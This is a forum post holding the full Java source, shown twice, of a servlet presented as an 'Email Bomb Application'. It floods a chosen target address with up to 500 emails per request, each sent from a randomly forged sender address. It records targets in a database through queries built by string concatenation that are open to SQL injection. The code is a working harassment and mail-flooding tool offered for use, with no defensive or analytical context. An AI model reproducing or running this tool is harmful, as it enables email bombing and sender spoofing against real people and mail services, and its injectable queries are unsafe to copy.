本文发表在 rolia.net 枫下论坛//Title: ResNETMP3JSP Email Bomb Application
//Description: Servlet for E-mail bomb action page.
import java.io.*;
import java.util.*;
import javax.mail.*;
import javax.mail.internet.*;
import javax.activation.*;
import java.sql.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class bombaction extends HttpServlet {
private String rsTarget = "";
private String rsSchedule = "";
private String rsNumBomb = "";
private Random ran = new Random();
public void doPost(HttpServletRequest request,HttpServletResponse response)
throws ServletException,IOException {
String subject = request.getParameter("subject");
String target = request.getParameter("target");
String message = request.getParameter("message");
String ip = request.getRemoteAddr();
int numBomb = Integer.parseInt(request.getParameter("numBomb"));
try {
Class.forName(getServletContext().getInitParameter("driver"));
Connection connStr = DriverManager.getConnection(getServletContext().getInitParameter("DBUrl"),"","");
if (!checkIP(connStr,ip,response)) {
connStr.close();
return;
}
if (!checkNum(numBomb,response)) {
connStr.close();
return;
}
if (!insertDB(rsTarget,target,rsNumBomb,numBomb,rsSchedule,ip,connStr,response)) {
connStr.close();
return;
}
connStr.close();
if (!mailBomb(target,subject,message,numBomb,response)){
return;
}
printErr("SUCCEED",response);
}
catch (ClassNotFoundException e) {
printErr("NOSQL",response);
}
catch (SQLException e) {
printErr("NOSQL",response);
}
}
private boolean checkIP(Connection connStr,String ip,HttpServletResponse response) {
try {
String sSQL = "SELECT * FROM MAILBOMB WHERE IP = '" + ip + "'";
Statement oCOM = connStr.createStatement();
ResultSet oRSs = oCOM.executeQuery(sSQL);
if (oRSs.next()) {
try {
this.rsNumBomb = oRSs.getString("NUMBOMB");
this.rsSchedule = oRSs.getString("SCHEDULE");
this.rsTarget = oRSs.getString("TARGET");
oRSs.close();
}
catch (SQLException e) {
}
return true;
}
else {
oRSs.close();
printErr("IP",response);
connStr.close();
return false;
}
}
catch (SQLException e) {
printErr("NOSQL",response);
return false;
}
}
private boolean insertDB(String rsTarget,String target,String rsNumBomb,int numBomb,
String rsSchedule,String ipParam,Connection connStr,HttpServletResponse response) {
final String schedule = function.get_MMDDYYYYTT_Date();
String ip = rsTarget + target + ",";
String times = rsSchedule + schedule + ",";
String bomb = rsNumBomb + Integer.toString(numBomb) + ",";
try {
String updateStr = "UPDATE MAILBOMB SET NUMBOMB = '" + bomb + "'," +
"TARGET = '" + ip + "'," +
"SCHEDULE = '" + times +
"' WHERE IP = '" + ipParam + "'";
Statement oCOM = connStr.createStatement();
oCOM.executeUpdate(updateStr);
oCOM.close();
connStr.close();
return true;
}
catch (SQLException e) {
printErr("NOSQL",response);
return false;
}
}
private boolean checkNum(int numBomb,HttpServletResponse response) {
if (numBomb > 500) {
printErr("TOOMUCH",response);
return false;
}
return true;
}
private boolean mailBomb(String target,String subject,String message,
int numBomb,HttpServletResponse response) {
try {
Properties props = new Properties();
props.put("mail.smtp.host", "localhost");
Session session = Session.getDefaultInstance(props,null);
session.setDebug(false);
for (int i=1; i-1<numBomb; i++) {
Message msg = new MimeMessage(session);
msg.setFrom(getAddress());
Address recipient = new InternetAddress(target);
msg.setRecipient(Message.RecipientType.TO, recipient);
String sub = subject + " " + Integer.toString(i) + " of " + Integer.toString(numBomb);
msg.setSubject(sub);
String validMsg = function.replace(message,"\r\n","");
msg.setText(validMsg);
Transport.send(msg);
}
return true;
}
catch (MessagingException e) {
printErr("NOSQL",response);
return false;
}
}
private Address getAddress() {
String add = randomStr(randomLen(1,30)) + "@" + randomStr(randomLen(1,15));
add += getEx();
try {
Address from = new InternetAddress(add);
return from;
}
catch (javax.mail.internet.AddressException e) {
Address from = new InternetAddress();
return from;
}
}
public double randomLen(double uBound,double lBound) {
double lenGen = Math.random();
double len = Math.floor((uBound-lBound+1)*lenGen+lBound);
return len;
}
public String randomStr(double len) {
String str = "";
String validChar = "abcdefghijklmnopqrstuvwxyz0123456789";
for (double j=0; j<len; j++) {
int lenGen = ran.nextInt(validChar.length());
str += validChar.charAt(lenGen);
}
return str;
}
private String getEx() {
String domain = ".ca,.com,.cn,.net,.org,.mil,.uk,.jp,.de,.no,.gov";
StringTokenizer tokens = new StringTokenizer(domain,",");
String[] domainArr = new String[tokens.countTokens()];
int num = ran.nextInt(domainArr.length);
for (int i = 0; i < num; i++) {
tokens.nextToken();
}
domainArr[num] = tokens.nextToken();
return domainArr[num];
}
private void printErr(String descr,HttpServletResponse response) {
try{
PrintWriter out = response.getWriter();
if (descr == "NOSQL") {
out.print("<font color='red'>Logging Error. Please Report to the Administrator via ");
out.println(" jeffrey815@hotmail.com.</font>");
}
if (descr == "IP") {
out.print("<font color='red'>You Don't have permission to use this utility. ");
out.println("Please contact the administrator via jeffrey815@hotmail.com.</font>");
}
if (descr == "TOOMUCH")
out.println("<font color='red'>The number of bombs cannot exceed 500.</font>");
if (descr == "SUCCEED")
out.println("Congratulation. Job Finished.");
}
catch (IOException e) {
}
}
}更多精彩文章及讨论,请光临枫下论坛 rolia.net
//Description: Servlet for E-mail bomb action page.
import java.io.*;
import java.util.*;
import javax.mail.*;
import javax.mail.internet.*;
import javax.activation.*;
import java.sql.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class bombaction extends HttpServlet {
private String rsTarget = "";
private String rsSchedule = "";
private String rsNumBomb = "";
private Random ran = new Random();
public void doPost(HttpServletRequest request,HttpServletResponse response)
throws ServletException,IOException {
String subject = request.getParameter("subject");
String target = request.getParameter("target");
String message = request.getParameter("message");
String ip = request.getRemoteAddr();
int numBomb = Integer.parseInt(request.getParameter("numBomb"));
try {
Class.forName(getServletContext().getInitParameter("driver"));
Connection connStr = DriverManager.getConnection(getServletContext().getInitParameter("DBUrl"),"","");
if (!checkIP(connStr,ip,response)) {
connStr.close();
return;
}
if (!checkNum(numBomb,response)) {
connStr.close();
return;
}
if (!insertDB(rsTarget,target,rsNumBomb,numBomb,rsSchedule,ip,connStr,response)) {
connStr.close();
return;
}
connStr.close();
if (!mailBomb(target,subject,message,numBomb,response)){
return;
}
printErr("SUCCEED",response);
}
catch (ClassNotFoundException e) {
printErr("NOSQL",response);
}
catch (SQLException e) {
printErr("NOSQL",response);
}
}
private boolean checkIP(Connection connStr,String ip,HttpServletResponse response) {
try {
String sSQL = "SELECT * FROM MAILBOMB WHERE IP = '" + ip + "'";
Statement oCOM = connStr.createStatement();
ResultSet oRSs = oCOM.executeQuery(sSQL);
if (oRSs.next()) {
try {
this.rsNumBomb = oRSs.getString("NUMBOMB");
this.rsSchedule = oRSs.getString("SCHEDULE");
this.rsTarget = oRSs.getString("TARGET");
oRSs.close();
}
catch (SQLException e) {
}
return true;
}
else {
oRSs.close();
printErr("IP",response);
connStr.close();
return false;
}
}
catch (SQLException e) {
printErr("NOSQL",response);
return false;
}
}
private boolean insertDB(String rsTarget,String target,String rsNumBomb,int numBomb,
String rsSchedule,String ipParam,Connection connStr,HttpServletResponse response) {
final String schedule = function.get_MMDDYYYYTT_Date();
String ip = rsTarget + target + ",";
String times = rsSchedule + schedule + ",";
String bomb = rsNumBomb + Integer.toString(numBomb) + ",";
try {
String updateStr = "UPDATE MAILBOMB SET NUMBOMB = '" + bomb + "'," +
"TARGET = '" + ip + "'," +
"SCHEDULE = '" + times +
"' WHERE IP = '" + ipParam + "'";
Statement oCOM = connStr.createStatement();
oCOM.executeUpdate(updateStr);
oCOM.close();
connStr.close();
return true;
}
catch (SQLException e) {
printErr("NOSQL",response);
return false;
}
}
private boolean checkNum(int numBomb,HttpServletResponse response) {
if (numBomb > 500) {
printErr("TOOMUCH",response);
return false;
}
return true;
}
private boolean mailBomb(String target,String subject,String message,
int numBomb,HttpServletResponse response) {
try {
Properties props = new Properties();
props.put("mail.smtp.host", "localhost");
Session session = Session.getDefaultInstance(props,null);
session.setDebug(false);
for (int i=1; i-1<numBomb; i++) {
Message msg = new MimeMessage(session);
msg.setFrom(getAddress());
Address recipient = new InternetAddress(target);
msg.setRecipient(Message.RecipientType.TO, recipient);
String sub = subject + " " + Integer.toString(i) + " of " + Integer.toString(numBomb);
msg.setSubject(sub);
String validMsg = function.replace(message,"\r\n","");
msg.setText(validMsg);
Transport.send(msg);
}
return true;
}
catch (MessagingException e) {
printErr("NOSQL",response);
return false;
}
}
private Address getAddress() {
String add = randomStr(randomLen(1,30)) + "@" + randomStr(randomLen(1,15));
add += getEx();
try {
Address from = new InternetAddress(add);
return from;
}
catch (javax.mail.internet.AddressException e) {
Address from = new InternetAddress();
return from;
}
}
public double randomLen(double uBound,double lBound) {
double lenGen = Math.random();
double len = Math.floor((uBound-lBound+1)*lenGen+lBound);
return len;
}
public String randomStr(double len) {
String str = "";
String validChar = "abcdefghijklmnopqrstuvwxyz0123456789";
for (double j=0; j<len; j++) {
int lenGen = ran.nextInt(validChar.length());
str += validChar.charAt(lenGen);
}
return str;
}
private String getEx() {
String domain = ".ca,.com,.cn,.net,.org,.mil,.uk,.jp,.de,.no,.gov";
StringTokenizer tokens = new StringTokenizer(domain,",");
String[] domainArr = new String[tokens.countTokens()];
int num = ran.nextInt(domainArr.length);
for (int i = 0; i < num; i++) {
tokens.nextToken();
}
domainArr[num] = tokens.nextToken();
return domainArr[num];
}
private void printErr(String descr,HttpServletResponse response) {
try{
PrintWriter out = response.getWriter();
if (descr == "NOSQL") {
out.print("<font color='red'>Logging Error. Please Report to the Administrator via ");
out.println(" jeffrey815@hotmail.com.</font>");
}
if (descr == "IP") {
out.print("<font color='red'>You Don't have permission to use this utility. ");
out.println("Please contact the administrator via jeffrey815@hotmail.com.</font>");
}
if (descr == "TOOMUCH")
out.println("<font color='red'>The number of bombs cannot exceed 500.</font>");
if (descr == "SUCCEED")
out.println("Congratulation. Job Finished.");
}
catch (IOException e) {
}
}
}更多精彩文章及讨论,请光临枫下论坛 rolia.net